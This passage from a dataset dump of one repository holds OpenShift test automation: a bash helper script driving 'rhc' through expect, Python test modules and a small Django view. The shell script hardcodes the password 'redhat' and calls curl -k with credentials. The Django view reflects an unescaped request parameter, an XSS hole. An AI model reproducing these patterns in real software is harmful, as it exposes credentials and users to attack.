-p$passwd|grep uuid|wc -l`\nbroker_url=`cat ~/.openshift/express.conf|grep -i libra_server|awk -F= '{print $2}'`\n\n\n#####################\n# $0 $user\n# default password is \"redhat\"\n#return value\n#####################\nrhc_setup()\n{\n [ $# -ne 1 ] && echo \"Please input correct format. such as: rhc_setup username\" && return 1\n domain_name=\"sun$(date +%m%d)\"\n expect -f - <<EOF\n spawn rhc setup\n expect {\n \"enter your OpenShift login (email or Red Hat login id):*\" {send \"$1\\r\";exp_continue}\n \"Password:\" {send \"$passwd\\r\";exp_continue}\n \"Checking for your namespace ... found namespace:*\" {send \"$domain_name\\r\"}\n }\nwait\nEOF\nrhc domain show > /dev/null\n[ $? -eq 0 ] && value=0 || value=1\nreturn $value\n}\n\n\n# $0 $app_type $scalable\n#####################\napp_create()\n{\n\tif [ $# -eq 2 ] && [ \"$2\" = \"-s\" ];then\n\t\tapp_name=${1%-*}${app_number}s\n\t\tcreate_command=\"rhc app create $app_name $1 -p${passwd} -s --timeout 360\" \n\telif [ $# -eq 1 ];then \n\t\tapp_name=${1%-*}${app_number}\n\t\tcreate_command=\"rhc app create $app_name $1 -p${passwd} --timeout 360\" \n\tfi\t\n\techo_bold \"The new create app NO. is : $app_number \"\n\techo_bold \"$create_command\"\n\texpect -f - <<EOF\n\tset timeout -1\n\tspawn $create_command\n\texpect {\n\t\t\t\t\"Are you *(yes/no)?\"\t{send \"yes\\r\";exp_continue}\n\t\t\t}\n\twait\nEOF\n\trhc app show $app_name -p${passwd} &>/dev/null\n\t[ $? -eq 0 ] && value=0 || value=1\n\t#[ -d $app_name ] && value=0 || value=1\n\tapp_number=$(($app_number + 1))\n\techo_blue \"Already have $app_number applations created!\"\n\treturn \"$value\"\n}\n\n#####################\n# $0 $app_name\n#####################\napp_snapshot()\n{\n\trhc snapshot save $1 -predhat\n}\n#####################\n# $0 $app_name $app_name\n# Source Target\n#####################\napp_restore()\n{\n\techo_bold \"rhc snapshot restore -f ${1}.tar.gz -a $2 -predhat\"\n\trhc snapshot restore -f ${1}.tar.gz -a $2 -predhat\n}\n\n#####################\n# $0 $app_name\n#####################\napp_delete()\n{\n echo_bold \"The delete app NO. is : $app_number\"\n\techo_bold \"rhc app delete $1 -p${passwd}\"\n\texpect -f - <<EOF\n\tset timeout -1\n\tspawn rhc app delete $1 -p${passwd} --timeout 360\n\texpect {\n\t\t\t\t\"Are you *(yes|no):\"\t{send \"yes\\r\";exp_continue}\n\t\t\t}\n\twait\nEOF\n\tapp_number=$(($app_number - 1))\n rhc app show $1 -p${passwd} &>/dev/null\n [ $? -ne 0 ] && value=0 || value=1\n return $value\n}\n#no parameter\napp_delete_all()\n{\n\tapps=`rhc domain show -p${passwd}|grep uuid|awk '{print $1}'`\n\techo_blue \"All APPs: $apps\"\n\tvalue=0\n\tfor app in $apps;do\n\t\trun app_delete $app\n\t\t[ $? -ne 0 ] && value=1 && break\n\tdone\n return $value\n}\n\n##########################\n# $0 $cartridge_type $app_name\n##########################\ncartridge_add()\n{\n\techo_bold \"rhc cartridge add $1 -a $2 -p${passwd} --timeout 360\"\n\trhc cartridge add $1 -a $2 -p${passwd} --timeout 360\n value=$?\n return $value\n}\n##########################\n# $0 $cartridge_type $app_name\n##########################\ncartridge_remove()\n{\n\techo_bold \"rhc cartridge remove $1 -a $2 -p${passwd} --confirm\"\n\trhc cartridge remove $1 -a $2 -p${passwd} --confirm\n}\n\n#################################\n# $0 $app_name\n#################################\ncartridge_oper_testing()\n{\n for oper in $cart_operations;do\n \techo_bold \"rhc cartridge $oper $1 -a $2 -predhat\"\n \trhc cartridge $oper $1 -a $2 -predhat\n [ $? -ne 0 ] && value=1 && break\n done\n}\n#################################\n# $0 $app_name\n#################################\nadd_hot_deploy()\n{\n\tcd $1\n\ttouch .openshift/markers/hot_deploy\n\tgit add .; git commit -am \"Add hot_deploy\" ;git push\n\tcd -\n}\n\nadd_disable_auto_scaling()\n{\n\tcd $1\n\ttouch .openshift/markers/disable_auto_scaling\n\tgit add . && git commit -am \"Add disable_auto_scaling\" && git push\n [ $? -eq 0 ] && value=0 || value=1\n\tcd -\n}\n\nssh_app()\n{\nif [ \"$#\" == \"1\" ];then\n\t #app_path=`rhc domain show -paaa|grep $1|grep \"SSH URL\"|awk -F'//' '{print $2}'`\n\t\tapp_path=`rhc app show -a $1 -p$passwd|grep -A0 \"SSH:\"|awk '{print $2}'`\n\t\techo \"$1 SSH path is : $app_path\"\n\t\tcd \n\t\tssh $app_path\nelse\n\t\techo \"Please input your App name.\"\n\t\techo \"Such as : $0 app1\"\nfi\n}\n\n#################################################################################\n#$0 $app_name $command\n#################################################################################\ntask_ssh_app()\n{\ncommand='mysql -Druby0 -e \"create table test(id int(8), name char(20));insert into test values('0','openshifit');select * from table;\"'\napp_path=`rhc app show -a $1 -p$passwd|grep -A0 \"SSH:\"|awk '{print $2}'`\necho \"$1 SSH path is : $app_path\"\nexpect -f - <<EOF\nset timeout -1\nspawn ssh $app_path\nexpect {\n \"*>\" {send \"$command\\r\";exp_continue}\n}\nwait\nEOF\n}\n\napp_service_pid()\n{\n\tapp_path=`rhc app show -a $1 -p$passwd|grep -A0 \"SSH:\"|awk '{print $2}'`\n\techo \"$1 SSH path is : $app_path\"\n\tcd $1\n\tif [[ \"$1\" =~ ^jbossas ]] || [[ \"$1\" =~ ^jbosseap ]];then\n\t\tpids=`ssh $app_path ps -ef|grep -i standalone|grep -v grep|awk '{print $2}'`\n\telif [[ \"$1\" =~ ^jbossews ]];then\n\t\tpids=`ssh $app_path ps -ef|grep jre|grep -v grep|awk '{print $2}'`\t\n\telse\n\t\tpids=`ssh $app_path ps -ef|grep -i bin/httpd|grep -v grep|awk '{print $2}'`\n\tfi\n\tcd -\n}\n\nadd_jenkins_client()\n{\n\tspawn rhc cartridge add jenkins-client -a $app -predhat\n}\n\n###################################\n#parameter 2\n# $0 action app_type/app_name\t\n###################################\nrest_api()\n{\n\tif [ \"$1\" = \"create\" ];then\n\t\tapp_type=$2\n\t\tapp_name=${app_type%-*}${app_number}s\n\t\tcurl -k -H \"Accept: application/xml\" --user \"$user:$passwd\" https://$broker_url/broker/rest/domains/$domain/applications -X POST -d name=$app_name -d cartridge=$app_type -d scale=true\n\t\t[ $? -ne 0 ] && return $? \n\t\t#git clone $(rhc app show $app_name -p$passwd|grep \"Git URL\"|awk '{print $3}')\n\t\texpect -f - <<EOF\n\t\tset timeout -1\n\t\tspawn rhc git-clone $app_name -p$passwd\n\t\texpect {\n\t\t\t\"Are you *(yes/no)?\" {send \"yes\\r\";exp_continue}\n\t\t}\n\t\twait\nEOF\n\telif [ \"$1\" = \"scale-up\" ] || [ \"$1\" = \"scale-down\" ];then\n\t\tapp=$2\n\t\techo_bold \"curl -k -H \"Accept: application/xml\" --user \"$user:$passwd\" https://$broker_url/broker/rest/domains/$domain/applications/$app/events -X POST -d event=$1\"\n\t\tcurl -k -H \"Accept: application/xml\" --user \"$user:$passwd\" https://$broker_url/broker/rest/domains/$domain/applications/$app/events -X POST -d event=$1\n\t\treturn $?\n\tfi\n}\n\n####################################\n#parameter number 1\n# $0 $app_name [$check_content]\n####################################\nurl_check()\n{\n\tcheck_name=$1\n#\tcurl http://p53-sun0131.p0129.com/read.php\n\t[ -n \"$2\" ] && check_content=$2 || check_content=\"Welcome to OpenShift\"\n\techo_bold \"curl http://$check_name-$domain.${broker_url#*.}|grep $check_content\"\n\tcurl http://$check_name-$domain.${broker_url#*.}|grep \"Welcome to OpenShift\"\n value=$?\n\t[ $value -eq 0 ] && echo_green \"Access $check_name Successed!\" || echo_red \"Access $check_name Failed!\"\n return $value\n}\n\n#parameter number 2\n# $0 $app_name $action_type\nscale_check()\n{\n\tapp_path=`rhc app show -a $1 -p$passwd|grep -A0 \"SSH:\"|awk '{print $2}'`\n\tscp $app_path:./haproxy-1.4/conf/haproxy.cfg .\n gears=$(curl -k -H \"Accept: application/xml\" --user \"${user}:${passwd}\" https://${broker_url}/broker/rest/domains/${domain}/applications/${1}/gears.json -X GET |python -mjson.tool|grep proxy_host|egrep -v \"null|$1\")\n gears_num=$(curl -k -H \"Accept: application/xml\" --user \"${user}:${passwd}\" https://${broker_url}/broker/rest/domains/${domain}/applications/${1}/gears.json -X GET |python -mjson.tool|grep proxy_host|egrep -v \"null|$1\"|wc -l)\n echo_blue \"Have gears after $2: $gears\"\n\t if [ $gears_num -ge 2 ] && [ \"$2\" = \"scale-up\" ];then\n\t\t\t echo_green \"Scale-up successed!\"\n\t\t\t cat haproxy.cfg |grep \"$domain\"\n\telif [ $gears_num -eq 1 ] && [ \"$2\" = \"scale-down\" ];then\n\t\techo_green \"Scale-down successed!\"\n\t\tcat haproxy.cfg |grep \"$domain\"\n\telse\n\t\t\techo_red \"$2 is Failed!\"\n value=1\n\tfi\n return $value\n}\n\n#app management testing\napp_oper_testing()\n{\n for oper in $app_operations;do\n \techo_bold \"rhc app $oper $1 -p$passwd\"\n \trhc app $oper $1 -p$passwd\n [ $? -ne 0 ] && value=1 && break\n done\n}\n\n#no parameter\nset_running_parameter()\n{\n\tSAVEDIFS=$IFS\n\tIFS='='\n\twhile read NAME VALUE\n\tdo\n\t\tcase $NAME in\n\t\t\t\\#*)\n\t\t\t\t;; #ignore comments\n\t\t\tcartridges)\n\t\t\t\tcartridges=$VALUE\n\t\t\t\t;;\n\t\t\tapp_types)\n\t\t\t\tapp_types=$VALUE\n\t\t\t\t;;\n \t\tapp_operations)\n \t\t\t app_operations=$VALUE\n\t\t\t\t;;\n\t\t\tcart_operations)\n\t\t\t\tcart_operations=$VALUE\n\t\tesac\n\tdone < $CONFIG_FILE\n\tIFS=$SAVEDIFS\n\techo_blue \"App types are :$app_types\"\n\techo_blue \"cartridges are :$cartridges\"\n}\n\n#rest_api delete all app and domain\nrest_api_delete()\n{\n\techo_bold \"curl -k -X DELETE -H 'Accept: application/xml' -d force=true --user ${user}:${passwd} https://${broker_url}/broker/rest/domains/$domain\"\n\tcurl -k -X DELETE -H 'Accept: application/xml' -d force=true --user ${user}:${passwd} https://${broker_url}/broker/rest/domains/$domain\n}\n\n#############################################\n# $0 $app_name $alias_string\n#############################################\nalias_add()\n{\n\techo_bold \"rhc alias add $2 ${1}.onpremise.com -p${passwd}\"\n\trhc alias add $2 ${1}.onpremise.com -p${passwd}\n}\n#############################################\n# $0 $app_name $alias_string\n#############################################\nalias_remove()\n{\n\techo_bold \"rhc alias remove $2 ${1}.onpremise.com -p${passwd}\"\n\trhc alias remove $2 ${1}.onpremise.com -p${passwd}\n}\n###########################################\n# $0 $app_name\n###########################################\nadd_mysql_data()\n{\napp_path=`rhc app show -a $1 -predhat|grep -A0 \"SSH:\"|awk '{print $2}'`\necho \"$1 SSH path is : $app_path\"\ncartridge_dir=`ssh $app_path env|grep OPENSHIFT_PRIMARY_CARTRIDGE_DIR|cut -d'=' -f2`\nsql_file=\"mysql_insert.sql\"\necho \"App Path: $app_path, Cartridge_dir: $cartridge_dir\"\n\nscp $sql_file $app_path:$cartridge_dir\n\nexpect -f - <<EOF\nspawn ssh $app_path \nexpect {\n\t\"\\['$1'*>\"\t\t\t{ send \"mysql -D'$1' < '$cartridge_dir'/'$sql_file'\\r\" }\n}\nsleep 1\nEOF\n}\n\n###########################################\n# $0 $app_name\n###########################################\ndelete_mysql_data()\n{\napp_path=`rhc app show -a $1 -predhat|grep -A0 \"SSH:\"|awk '{print $2}'`\necho \"$1 SSH path is : $app_path\"\ncartridge_dir=`ssh $app_path env|grep OPENSHIFT_PRIMARY_CARTRIDGE_DIR|cut -d'=' -f2`\nsql_file=\"mysql_delete.sql\"\necho \"App Path: $app_path, Cartridge_dir: $cartridge_dir\"\nscp $sql_file $app_path:$cartridge_dir\n\nexpect -f - <<EOF\nspawn ssh $app_path \nexpect {\n \"\\['$1'*>\" { send \"mysql -D'$1' < '$cartridge_dir'/'$sql_file'\\r\" }\n}\nsleep 1\nEOF\n}\n" }, { "alpha_fraction": 0.7326607704162598, "alphanum_fraction": 0.746532142162323, "avg_line_length": 27.321428298950195, "blob_id": "36da87090ee4f1ce4741cac1b08f08ef0531f133", "content_id": "eab4e10bdb8ab3f24ef13db378134b4b796b3eaa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 793, "license_type": "no_license", "max_line_length": 112, "num_lines": 28, "path": "/automation/open/testmodules/RT/hot_deploy/jbosseap_prebuilt_wars_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nNov 7, 2012\n\"\"\"\n\nimport rhtest\nimport common\nfrom jbossas_prebuilt_wars_without_jenkins import JBossHotDeployPrebuiltWarsWithoutJenkins\n\nclass EAPHotDeployPrebuiltWarsWithoutJenkins(JBossHotDeployPrebuiltWarsWithoutJenkins):\n def __init__(self, config):\n JBossHotDeployPrebuiltWarsWithoutJenkins.__init__(self, config)\n self.config.application_type = common.app_types['jbosseap']\n self.config.summary = \"[US2443] Hot deployment support for Jboss EAP6 application with 2 pre-built wars\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EAPHotDeployPrebuiltWarsWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.615717351436615, "alphanum_fraction": 0.6330209374427795, "avg_line_length": 29.811111450195312, "blob_id": "33c8e87fa991af5fd3b0a526507a62dfa88c4803", "content_id": "80e211f4d77357f44c4409b05491a74b82b5c811", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2774, "license_type": "no_license", "max_line_length": 211, "num_lines": 90, "path": "/automation/open/testmodules/UI/web/case_180948.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_174336.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CreateRubyAndRailsAppAndChangeDomainName(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.login()\n\n #create a jbosseap app\n #web.create_app(\"rails\",\"rubyonrails\")\n web.create_app(\"rails\", \"rubyonrails\")\n \n time.sleep(20)\n web.assert_text_equal_by_xpath('''Your application has been created. If you're new to OpenShift check out these tips for where to go next.''', '''//div[@id='content']/div/div/div/div[2]/div/section/p''')\n \n \n #go to my account page and change domain name\n web.go_to_domain_edit()\n web.input_by_id(\"domain_name\",\"yujzhangcccc\")\n web.click_element_by_id(\"domain_submit\")\n time.sleep(10)\n web.assert_text_equal_by_xpath(\"Your domain has been changed. Your public URLs will now be different\",'''//div[@id='content']/div/div/div/div[2]/div/div/div''') \n\n #check the url after changed the domain name\n web.go_to_app_detail(\"rubyonrails\")\n web.assert_text_equal_by_xpath(\"http://rubyonrails-yujzhangcccc.stg.rhcloud.com/\",'''//div[@id='content']/div/div/div/div[2]/nav/div/a''')\n \n\n #change the domain name back\n web.go_to_domain_edit()\n web.input_by_id(\"domain_name\",\"yujzhang\")\n web.click_element_by_id(\"domain_submit\")\n time.sleep(10)\n web.assert_text_equal_by_xpath(\"Your domain has been changed. Your public URLs will now be different\",'''//div[@id='content']/div/div/div/div[2]/div/div/div''') \n\n \n #web.delete_last_app(\"rubyonrails\")\n web.go_to_app_detail(\"rubyonrails\")\n time.sleep(2)\n web.click_element_by_link_text(\"Delete this application\")\n time.sleep(1)\n web.click_element_by_name(\"commit\")\n time.sleep(60)\n web.assert_text_equal_by_xpath('''Create your first application now!''', '''//div[2]/div/div/div''')\n \n\n\n self.tearDown()\n\n return self.passed(\" case_180948--CreateRubyAndRailsAppAndChangeDomainName passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CreateRubyAndRailsAppAndChangeDomainName)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_174336.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6851063966751099, "alphanum_fraction": 0.6851063966751099, "avg_line_length": 26.647058486938477, "blob_id": "59098b95ca2593cb23281a01f134bdd774060e2f", "content_id": "d6249493263afa722c0acdd9f1311749d885c4a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 470, "license_type": "no_license", "max_line_length": 69, "num_lines": 17, "path": "/ajaxtest/mysite/views.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "# Create your views here.\n\nfrom django.http import HttpResponse\nfrom django.shortcuts import render_to_response\n\ndef test_ajax(request):\n \"\"\"docstring for search_form\"\"\"\n return render_to_response('test_page.html')\n\n\ndef result(request):\n \"\"\"docstring for result\"\"\"\n if 'ipt_value' in request.GET:\n message = 'Searched result is: %s' % request.GET['ipt_value']\n else:\n message = 'You submitted a empty form'\n return HttpResponse(message)\n" }, { "alpha_fraction": 0.5193093419075012, "alphanum_fraction": 0.5261631608009338, "avg_line_length": 36.004878997802734, "blob_id": "5e8c9f702b40432f9251020b1481b3fa2ac012e4", "content_id": "accd534be9c8654890a6c3404c5a9c70c1081325", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7587, "license_type": "no_license", "max_line_length": 152, "num_lines": 205, "path": "/automation/open/testmodules/RT/cartridge/snapshot_restore_mongodb.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n#\n# File name: snapshot_restore_mongodb.py\n# Date: 2012/03/20 13:47\n# Author: [email protected]\n#\n\nimport os\nimport common\nimport rhtest\nimport OSConf\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.info(\"[US1209][RT][cartridge]take snapshot and restore without new app for embedded mongodb\")\n self.app_name = common.getRandomString(10)\n try:\n self.app_type = self.get_variant()\n except:\n self.app_type = 'jbossews'\n try:\n self.scalable = self.config.tcms_arguments['scalable']\n except:\n self.scalable = False\n self.mongo_type = \"mongodb\"\n\n self.info(\"VARIANT: %s\"%self.app_type)\n self.info(\"SCALABLE: %s\"%self.scalable)\n self.snapshot_file = \"snapshot_%s.tar.gz\"%self.app_name\n\n common.env_setup()\n\n def finalize(self):\n pass\n\nclass SnapshotRestoreMongodb(OpenShiftTest):\n def test_method(self):\n #1\n if self.scalable:\n self.add_step(\"Create scalable %s application\"%self.app_type,\n common.create_scalable_app,\n function_parameters=[self.app_name, \n common.app_types[self.app_type], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, \n False],\n expect_return=0)\n else:\n self.add_step(\"Create a %s application\"%self.app_type,\n common.create_app,\n function_parameters=[self.app_name, \n common.app_types[self.app_type], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, \n True],\n expect_return=0)\n\n #2\n self.add_step(\"Embed with mongodb\" ,\n common.embed,\n function_parameters = [self.app_name,\n 'add-%s'%common.cartridge_types[self.mongo_type],\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_return=0)\n\n if self.scalable:\n self.add_step(\"Scale up...\",\n #self.config.rest_api.app_scale_up,\n common.scale_up,\n function_parameters = [self.app_name],\n expect_return=0)\n\n self.add_step(\"Insert initial data into mongoDB\",\n self.process_mongo_data,\n function_parameters = ['insert', '{\"name1\": \"Tim\" }'],\n expect_return=0)\n\n self.add_step(\"Insert initial data into mongoDB\",\n self.process_mongo_data,\n function_parameters = ['insert', '{\"name1\": \"Jim\" }'],\n expect_return=0)\n\n self.add_step(\"Verify recent insert into mongoDB\",\n self.process_mongo_data,\n function_parameters = ['find', '{\"name1\": \"Jim\" }', \"Jim\"],\n expect_description = 'Entry of \"Jim\" should be there...',\n expect_return=0)\n\n self.add_step(\"Verify recent insert into mongoDB\",\n self.process_mongo_data,\n function_parameters = ['find', '{\"name1\": \"Tim\" }', \"Tim\"],\n expect_description = 'Entry of \"Tim\" should be there...',\n expect_return=0)\n\n self.add_step(\"Make a snapshot\",\n \"rhc snapshot save %s -l %s -p '%s' -f %s %s\"\n %(self.app_name,\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd,\n self.snapshot_file,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0)\n\n #6\n self.add_step(\"Drop the initial data from mongoDB\",\n self.process_mongo_data,\n function_parameters=['remove', '{\"name1\": \"Jim\" }'],\n expect_description = 'Jim should be removed without errors...',\n expect_return=0)\n\n self.add_step(\"Insert Tom into mongoDB\",\n self.process_mongo_data,\n function_parameters=['insert', '{\"name1\": \"Tom\" }'],\n expect_description = 'Tom should be added without errors...',\n expect_return=0)\n\n #7\n self.add_step(\"Verify recent drop from mongoDB\",\n self.process_mongo_data,\n function_parameters=['find', '{\"name1\": \"Jim\" }',None,\"Jim\"],\n expect_description = '\"Jim\" should not be there...',\n expect_return = 1)\n \n self.add_step(\"Verify recent insert to mongoDB\",\n self.process_mongo_data,\n function_parameters=['find', '{\"name1\": \"Tom\" }', \"Tom\"],\n expect_description = '\"Tom\" should be there...',\n expect_return=0)\n \n #8\n self.add_step(\"Restore from snapshot\",\n \"rhc snapshot restore %s -l %s -p '%s' -f %s %s\"\n %(self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, self.snapshot_file, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = 'Should pass',\n expect_return=0)\n\n #9\n self.add_step(\"Check if the Tim is there\",\n self.process_mongo_data,\n function_parameters = ['find', '{\"name1\": \"Tim\"}', \"Tim\"],\n expect_description = 'Tim should be there there.',\n expect_return = 0)\n\n self.add_step(\"Check if the Jim is there\",\n self.process_mongo_data,\n function_parameters = ['find', '{\"name1\": \"Jim\"}', \"Jim\"],\n expect_description = 'Jim should be there.',\n expect_return = 0)\n\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n def process_mongo_data(self, operation, data, expect_str=None, unexpect_str=None):\n mongo_cred = OSConf.get_embed_info(self.app_name, common.cartridge_types[self.mongo_type])\n \n #print mongo_cred\n #print mongo_cred[\"username\"]\n script = \"db.test.%s(%s)\"%(operation, data)\n if (operation == 'find'):\n script += \".forEach(printjson)\"\n script += \";\"\n\n js_script = \"/tmp/m.js\"\n mongo_cmds = \"echo 'use %s;' >%s\"%(self.app_name,js_script)\n mongo_cmds += \"; echo '%s' >>%s\"%(script, js_script)\n mongo_cmds += \"; mongo --verbose -u %s -p %s %s:%s/admin < %s \"%(\n mongo_cred[\"username\"],\n mongo_cred[\"password\"],\n mongo_cred['url'],\n mongo_cred['port'],\n js_script)\n if operation == 'find':\n mongo_cmds += \" | grep ObjectId \"\n\n (status, output) = common.run_remote_cmd(self.app_name, mongo_cmds)\n\n if expect_str:\n self.assert_match(expect_str, output, \"Unable to find `%s` string in the output.\"%expect_str)\n if unexpect_str:\n self.assert_not_match(unexpect_str, output, \"Unexpected `%s` string in the output.\"%unexpect_str)\n\n return status\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(SnapshotRestoreMongodb)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of snapshot_restore_mongodb.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5469971299171448, "alphanum_fraction": 0.557673990726471, "avg_line_length": 31.774999618530273, "blob_id": "f734e57f1721c9f3b6118606d06386bf17e8587d", "content_id": "c1d3df0965f77fe92fcaff50f21bb1567da39164", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5245, "license_type": "no_license", "max_line_length": 163, "num_lines": 160, "path": "/automation/open/testmodules/RT/node/public_tcp_proxy.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#\n# File name: public_tcp_proxy.py\n# Date: 2012/02/14 01:32\n# Author: [email protected]\n#\n\nimport sys\nimport os\nimport re\n\nimport rhtest\nimport testcase, common, OSConf\n\nHOST=None\nPORT=None\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[US1371][Runtime][Horizontal Scaling] Public TCP proxy solution\"\n self.app_name1 = 'ctrapp1'\n self.app_name2 = 'ctrapp2'\n self.app_type = 'php'\n tcms_testcase_id = 130875\n self.steps = []\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s %s\"%(self.app_name1, self.app_name2))\n\nclass PublicTcpProxy(OpenShiftTest):\n def test_method(self):\n self.steps.append(testcase.TestCaseStep(\n \"Deploy app1\", \n common.create_app,\n function_parameters = [self.app_name1, \n common.app_types[self.app_type], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, True],\n expect_return=0))\n\n self.steps.append(testcase.TestCaseStep(\n \"Deploy app2\",\n common.create_app,\n function_parameters = [self.app_name2, \n common.app_types[self.app_type], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, True],\n expect_return = 0))\n\n \n self.steps.append(testcase.TestCaseStep(\n \"Call Expose hook the public ports\",\n self.expose_port,\n function_parameters = [self.app_name1],\n expect_return = 0))\n\n self.steps.append(testcase.TestCaseStep(\n \"Modify the app2 to comunicate (as client)\" , \n self.add_client,\n function_parameters = [self.app_name2],\n expect_return=0))\n\n self.steps.append(testcase.TestCaseStep(\"Check the communication.\",\n self.verify_proxy,\n function_parameters = [self.app_name2],\n expect_return=0,\n expect_description=\"It should return a response from CtrApp1\"))\n\n case = testcase.TestCase(self.summary, self.steps)\n case.run()\n common.destroy_app(self.app_name1, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n common.destroy_app(self.app_name2, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n os.system(\"rm -Rf %s\" % self.app_name1)\n os.system(\"rm -Rf %s\" % self.app_name2)\n \n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n def verify_proxy(self, app_name):\n url = OSConf.get_app_url(app_name)\n return common.grep_web_page(\"%s/client.php\"%url, 'Welcome to OpenShift')\n \n def add_client(self, app_name):\n cmd = '''\ncd %s &&\ncat <<'EOF' >php/client.php &&\n<?php\n error_reporting(E_ALL);\n print \"Hello from client.php<hr/>\";\n $port = %s;\n $host = \"%s\";\n $url = \"$host:$port\";\n print \"$url\";\n $error_FH = fopen(\"error.log\",\"w\") or die(\"Unable to open stderr log file.\");\n $ch = curl_init();\n curl_setopt($ch, CURLOPT_URL, $url);\n curl_setopt($ch, CURLOPT_HEADER, 1);\n curl_setopt($ch, CURLOPT_STDERR, $error_FH);\n curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\n curl_setopt($ch, CURLOPT_VERBOSE, 1);\n print \"<pre>\";\n print curl_exec($ch);\n print \"</pre>\";\n curl_close($ch);\n print \"<hr/>client.php done.\";\n?> \nEOF\n git add php/client.php &&\n git commit -a -m \"Added client.php\" &&\n git push\n '''%(app_name, PORT, HOST),\n (status, output) = common.command_getstatusoutput(cmd)\n return status\n\n def expose_port(self, app_name):\n global HOST\n global PORT\n uuid = OSConf.get_app_uuid(app_name)\n cmd = '/usr/libexec/openshift/cartridges/%s/info/hooks/expose-port %s %s %s ' % (common.app_types[self.app_type], app_name, common.get_domain_name(), uuid)\n (status, output) = common.run_remote_cmd(None, cmd, as_root=True)\n\n if status != 0:\n return status\n\n obj = re.search(r\".*PROXY_HOST=(.*)\", output, re.MULTILINE)\n if obj:\n host=obj.group(1)\n obj = re.search(r\".*PROXY_PORT=(\\d+)\", output, re.MULTILINE)\n if obj:\n HOST= host\n PORT = obj.group(1)\n else:\n print \"ERROR: Unable to catpure PROXY_PORT\"\n return -1\n else:\n print \"ERROR: Unable to catpure PROXY_HOST\"\n return -1\n\n return status\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PublicTcpProxy)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of public_tcp_proxy.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6026058793067932, "alphanum_fraction": 0.6108449697494507, "avg_line_length": 39.765625, "blob_id": "6ae169d7a71774760297aba0169c097af6fb61a8", "content_id": "12cc3ee1be6e05586b0b9fed374d4c7231cc6c66", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5219, "license_type": "no_license", "max_line_length": 375, "num_lines": 128, "path": "/automation/open/testmodules/RT/cartridge/jboss_sample_applications.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[rhc-cartridge]JBoss cartridge: three sample applications test\nhttps://tcms.engineering.redhat.com/case/122280/\n\"\"\"\nimport os,sys,re,time\n\nimport testcase\nimport common\nimport OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[rhc-cartridge]JBoss cartridge: three sample applications test\" \n # test_name should be among tweetstream,kitchensink\n try:\n self.test_variant = self.config.test_variant\n except:\n self.info(\"Missing OPENSHIFT_test_name, using 